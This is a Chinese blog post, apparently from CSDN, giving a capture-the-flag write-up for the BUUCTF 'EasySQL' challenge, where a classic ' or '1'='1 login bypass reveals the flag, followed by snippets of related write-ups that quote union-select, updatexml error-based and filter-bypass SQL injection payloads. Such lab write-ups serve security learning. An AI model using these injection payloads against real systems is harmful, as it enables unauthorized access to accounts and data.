第二题——[极客大挑战 2019]EasySQL

最新推荐文章于 2023-09-30 23:21:57 发布
最新推荐文章于 2023-09-30 23:21:57 发布
阅读量158 收藏
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115351767
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,发现一个登录页面,由于题目给出提示,使用SQL注入进行攻击

在这里插入图片描述

第二步:构造SQl语句,使其通过登录检测

  1. 用户名一栏输入a' or '1'='1
  2. 密码一栏输入b' or '1'='1
  3. 点击登录,发现flag:flag{d0c260b5-1d98-4962-ac9a-501f791cc5c6}
    在这里插入图片描述
想学习安全的小白
关注
专栏目录
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
06-23
2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。...
Buuctf-Web-[极客挑战 2019]EasySQL 1 解及思路总结
热门推荐
m0_62239233的博客
09-16 1万+
SQL注入。
BUUCTF 极客挑战2019 EasySQL
最新发布
qq_60397796的博客
09-30 195
一个简单的WP
CTF-Web-[极客挑战 2019]Upload
归子莫的博客
05-03 5003
CTF-Web-[极客挑战 2019]Upload 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges Web类,[极客挑战 2019]Upload 打开目的实例 思路 做一个phtml的文件 将...
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 308
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看目 一看就和上一 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
BUUCTF:[SUCTF 2019]EasySQL
末初的CSDN博客
10-06 5717
目地址:https://buuoj.cn/challenges#[SUCTF%202019]EasySQL SQL查询,观察回显,这里应该是用var_dump()输出 在测试查询的时候发现有些字符能使用,有些字符被过滤了,因此查询点进行fuzz测试,看看过滤了哪些字符 回包长度为523的都是可以使用的,其他的字符均已被过滤 PS:这里使用Burp进行fuzz的线程不要开太高,容易报429,fuzz的字符不多可以慢慢跑 ;可以使用,尝试堆叠注入 首先这里的query参数无论我们输入数字什么都只会回
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
[2020网络安全管理职业技能竞赛全国选拔赛]easy_sql
末初的CSDN博客
11-06 789
Trick updatexml报错注入 大小写绕过过滤得字符 Fuzz测试过滤了哪些字符 查所有数据库 uname=admin')and updatexml('~',concat('~',(select mid(group_concat(schema_name),1) from inFoRmaTion_schema.schemata),'~'),'~')#&passwd=admin uname=admin')and updatexml('~',concat('~',(select m..
BUUCTF--[极客挑战 2020]Greatphp
qq_46263951的博客
08-11 1235
进入页面后可以看到给出的代码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
[BUUCTF-Web]学习笔记-目1【SUCTF2019Easy SQL
羊柳树的博客
03-31 736
1,目来源:CTF平台:BUUCTF Web部分 https://buuoj.cn/challenges 目:[SUCTF 2019]EasySQL 2,Flag以及解答后目截图: flag{4c1665f4-353b-4077-8ef7-c864bdba482b} 3,解思考过程及分析: 1,经过一系列的输入测试发现,输入数字时会显示 Array ( [0] => 1 ) 而输入0则不显示 但输入flag会提示 Nonono. 那么它内部到底是一个怎么样的sql语句呢? 我们猜测它
BUUCTF -[极客挑战 2019]Secret File1 write up
m0_62851980的博客
04-09 1781
打开靶机,老规矩f12查看代码信息: 我们注意到有:/Archive room.php,带到网址里尝试访问,得到第二个网页: 点一下按钮,但是第三个网页告诉我们没看清,说明网页出现的时间很短, 提示回去看看,我们就返回第二个页面f12查看源码时发现 有一个名为/action.php的网址,我们进行在这个页面进行bp抓包后右键发送给Reapter,在GET处修改为action.php : 点击发送,发现一个被注释掉的网址:secr3t.php 我们在网址处输入查...
[极客挑战 2019]EasySQL1
tomatoff的博客
03-09 4141
这里写自定义目录标欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
BUUCTF | Misc 二维码 -- BUUOJ WriteUP
zxsctf的博客
07-15 3612
网络安全人才需要科班培养和社会培养齐头并进,而科班培养存在教师,教材,教学资源和环境如何跟上网络技术发展的问。网络信息化建设突飞猛进,互联网基础环境全面优化,网络空间法治化快速推荐,为促进网络空间日渐清朗、网络文化全面繁荣、提升以互联网为基础的国家经济发展重要驱动力,网络安全与我们每个人息息相关。青少年网络安全(原中学生CTF)是以帮助青少年学习信息安全与网络技术为基础核心,将贯彻网络强国的国家战略为基础内涵的学习、练习平台,尽可能多的给予大家更多的学习资源。拿到了一个二维码,首先扫描,发现提示我们“..
[原复现][极客挑战 2019]HardSQL(update报错注入)
笑花大王
02-15 2970
简介 原复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平台找到此 复现 经过手工测试过滤了and、= 空格 union等多个sql关键字 要思考如何绕过这些关键字去注入! 使用updatexml报错法注入 查数据库信息 http://1bfb...
BUUCTF:[极客挑战 2019]HardSQL
末初的CSDN博客
11-07 607
目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
BUUCTF-web-[极客挑战 2019]Havefun
weixin_44866139的博客
05-15 298
一起来撸猫 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> 这就出来了…
BUUCTF之[极客挑战 2019]BuyFlag 解过程
weixin_44632787的博客
06-18 749
BUUCTF之[极客挑战 2019]BuyFlag 解过程 启动我们的挑战项目 鼠标右键查看一下源代码。发现有两个跳转链接:index.php和pay.php。经过排查,最终锁定在pay.php这个页面(而且目也说了BuyFlag)。 打开pay.php页面后是这样子的 然后再用BurpSuite抓包看看,并把抓到的包发送到Repeater模块… 老实说,这道我在这里被卡了很久很久。最终是看了别人的WP才知道要把user=0改成user=1。(之前做的其它CTF中也是要把user的值从0改
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个目,它是一个简单的 SQL 数据库查询目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值